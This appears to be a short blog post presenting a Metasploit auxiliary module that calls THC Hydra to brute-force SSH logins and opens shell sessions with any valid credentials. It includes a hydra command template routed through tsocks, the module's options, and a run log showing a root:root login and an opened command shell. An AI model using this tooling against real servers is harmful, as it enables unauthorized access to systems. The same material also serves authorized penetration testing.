Brute-forcing SSH accounts with THC Hydra and Metasploit
I have written a simple Auxiliary module for Metasploit that permits to brute-force SSH accounts with THC Hydra and load the sessions in Metasploit.
The approach is as simple as executing Hydra from the shell and recovering the valid credentials with a regular expression. After this, we o nly have to open a new session with the SSH libraries available in the framework.
As a side note, this module cannot be used through pivoting like any external program, but the code can be modified to call hydra with a wrapper like tsocks and then scan trough the Socks4a server module.
$ tsocks hydra -f -o {logfile} -w {timeout} -t {threads} \
-s {rport} -C{credentials} {ip} ssh2
NOTE: Some of the code is borrowed from the existing SSH auxiliary modules.
Example output:
msf auxiliary(ssh_hydra) > info
Name: Scanning SSH servers with Hydra
Module: auxiliary/scanner/ssh/ssh_hydra
Version: 1
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CREDENTIALS /tmp/credentials yes colon separated list of credentials
RHOSTS X.X.X.X yes The target address range or CIDR identifier
RPORT 22 yes The target port
TASKS 8 yes number of connexions in parallel
TIMEOUT 30 yes timeout for the responses
This module will launch THC hydra to brute-force the ssh credentials and then open the
sessions with the valid ones.
msf auxiliary(ssh_hydra) > run
[*] X.X.X.X:22, SSH server version: SSH- 1.99-OpenSSH_4.4
[*] Attacking X.X.X.X
[*] X.X.X.X:22 /tmp/credentials - Calling Hydra
[*] Valid credentials found: X.X.X.X root root
[*] Command shell session 1 opened (Y.Y.Y.Y:35009 -> X.X.X.X:22) at Fri Aug 05 19:06:00 +0200 2011
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The module can be found here: ssh_hydra.rb